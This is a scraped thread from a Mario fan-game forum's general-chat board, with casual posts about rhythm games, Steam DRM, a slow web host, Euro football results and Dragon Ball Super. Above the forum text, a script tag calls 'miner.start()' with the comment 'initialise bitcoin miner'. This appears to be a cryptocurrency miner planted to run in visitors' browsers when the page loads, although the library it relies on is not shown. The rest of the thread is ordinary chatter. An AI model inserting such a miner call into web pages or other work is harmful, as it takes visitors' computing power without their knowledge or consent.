<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralmario fan games galaxy

talkhaus thoughts

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
momo

Re: Twitter Thread

Postby momo » 4 years ago

actually got reasonably close to beating this song
high bpm songs are really fun when you can process all the notes

GlitchedGhost

Postby GlitchedGhost » 4 years ago

Alice wrote:Finally got a reply saying they were going to transfer my ticket to another department and would get another reply soon. Haven't heard anything else yet though and of all things their support site is apparently having issues now, lol. Refreshed the page for my support ticket and just got this:
So if they host their own support site it may potentially be a more widespread issue than just our server.
10/10
He captured!
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower

Alice
Pronouns: Girl person

Postby Alice » 4 years ago

Oh yes, how could I possibly forget to start Steam before starting the game despite starting the game through Steam.
GlitchedGhost wrote:...
10/10
If they're going to continue being this awful then when our prepaid server time is up in November or December I may need to look into switching to a host that doesn't suck.

momo

i might stream rabi-ribi tonight if anyone is interested
after some testing it had some framerate issues, so i'll figure out something else to play

Ashan
The world has become a place

Postby Ashan » 4 years ago

I had a theory that there is a big overlap between Windows Phone users and religious people, and while it started as kind of a joke-ey anecdotal thing, the more I've seen, the more I've realized that it actually seems to be a thing. And I have a good theory on why it is. There's a LOT of not only overlap, but straight up parallels between the communities.

momo

would anyone be interested in a "let's watch" kind of thing where me and one or two other people watch a movie or show and riff on it

Coryman
The road to nowhere leads to me
First name: Cory
Pronouns: he/him/his

Postby Coryman » 4 years ago

Now that my knees are soaked in vinegar, I can go to bed.
Apparently it helps with bug bites.
raocow wrote: In a world where shag carpeting wins a fight against a helicopter, we spend a lot of time reading and comparing numbers.

Drei
First name: Stirling
Pronouns: he/him/his

Postby Drei » 4 years ago

totes momo

Alice

Alice wrote:http://i.imgur.com/xLPGV1W.png
Oh yes, how could I possibly forget to start Steam before starting the game despite starting the game through Steam.
Man, I sure love Steam's worthless drm. It's barely even an obstacle for pirates yet it constantly inconveniences legitimate game owners. In this case literally nothing seems to fix this error. I'd be better off pirating the game I own legitimately. Good job only further solidifying my opinion on buying shit from your store Valve. A+ job there.

cats-on-ice
Back from the grave

Postby cats-on-ice » 4 years ago

Image<--- I h8 u horikawa

Ashan

I am your fourth follower. Remember me on your way to twitter stardom

Ashan

Say what you want about motion controls, but I love using them for aiming in first person mode in the Zelda games that support it. In OoT3D, MM3D, WWHD, and TPHD you can move the 3DS/Gamepad around to aim in first person, and it makes it so much easier. I can usually get the shooting games on my first try, which I couldn't with regular controls.

Mata Hari

Postby Mata Hari » 4 years ago

Normally I don't give a shit about sports but as an Englisher I am so fucking happy that England lost to Iceland in the Euros

Hahahahahahahaha

Bean

Postby Bean » 4 years ago

Took close to a year, but this Dragon Ball Super thing is getting kind of neato.

Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.

Postby Telamon » 4 years ago

Mata Hari wrote:Normally I don't give a shit about sports but as an Englisher I am so fucking happy that England lost to Iceland in the Euros

Hahahahahahahaha
Plus, Northern Ireland, Wales and Scotland all made it as far or farther.

my favorite part is that, according to the announcer, 8% of Iceland's population was at the game. Even given that Iceland is TINY, that is still amazing and mind-blowing.

Every Olympics I root for Iceland in Handball because they're good at it and they're so tiny, but them winning in futbol is just nuts...

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 4 years ago

Bean wrote:Took close to a year, but this Dragon Ball Super thing is getting kind of neato.
I miss the charms of good ol dragon ball. Idk if I should take black Goku serious, or just laugh at how cliche it is.
That crazy voice dude

Bean

Postby Bean » 4 years ago

Anything past Cell that's halfway decent is just fine by me. This new arc is okay so far and the previous tournament thing was all right, too.

TheVulpineHero1
Party hazard fiesta mix

Postby TheVulpineHero1 » 4 years ago

Telamon wrote:
Mata Hari wrote:Normally I don't give a shit about sports but as an Englisher I am so fucking happy that England lost to Iceland in the Euros

Hahahahahahahaha
Plus, Northern Ireland, Wales and Scotland all made it as far or farther.

my favorite part is that, according to the announcer, 8% of Iceland's population was at the game. Even given that Iceland is TINY, that is still amazing and mind-blowing.

Every Olympics I root for Iceland in Handball because they're good at it and they're so tiny, but them winning in futbol is just nuts...
As an Englisher, I am also politely jazzed that our team of chronically overpaid thugs lost. Really -- from a layman point of view, I hasten to add -- it feels like our football has been coasting on its bank account for a while now, as opposed to skill.
Broken image, apparently
Broken image

Minnakht
Green eyed monster

Postby Minnakht » 4 years ago

Mata Hari wrote:
Minnakht wrote:Minnakht
I just now realized that you have the same username as a dude on another forum. Are you into Magic the Gathering?
Not particularly, but I'm very much into making fan "content" for games I hardly play.

Mata Hari

Postby Mata Hari » 4 years ago

Minnakht wrote:Not particularly, but I'm very much into making fan "content" for games I hardly play.
It's a curse innit

Alice

Apparently when it comes to tech support for web hosting services "You will be updated soon" means at least four days. Didn't realize four days was soon...

Zeldamaster12

Postby Zeldamaster12 » 4 years ago

Still need to get caught up on Dragon Ball Super. Last ep I watched was the last ep of Superhuman Water.
stuff goes here

GlitchedGhost

Postby GlitchedGhost » 4 years ago

Alice wrote:Apparently when it comes to tech support for web hosting services "You will be updated soon" means at least four days. Didn't realize four days was soon...
RIP IsoNation 201X-2016
He captured!
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower

Alice

GlitchedGhost wrote:RIP IsoNation 201X-2016
The really annoying part is that everything except the forums seems to work fine. All my uploaded files, the Distorted Travesty stuff I setup for Zephyr which also includes a SQL database to track download amounts. It's only the forums that seems to have an issue and it seems to be an issue with the server itself so I can't fix it from my end. Their support techs would need to look into it but apparently they're too busy doing who knows what to even respond, let alone in a timely manner. It'll be a pain to figure it all out but I very seriously doubt we'll be sticking with this host once our prepaid time is up in November or December. I'll need to look into a hosting service that isn't total garbage.

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 4 years ago

Yay for unexpected financial troubles..
That crazy voice dude

Return to “the gazebo”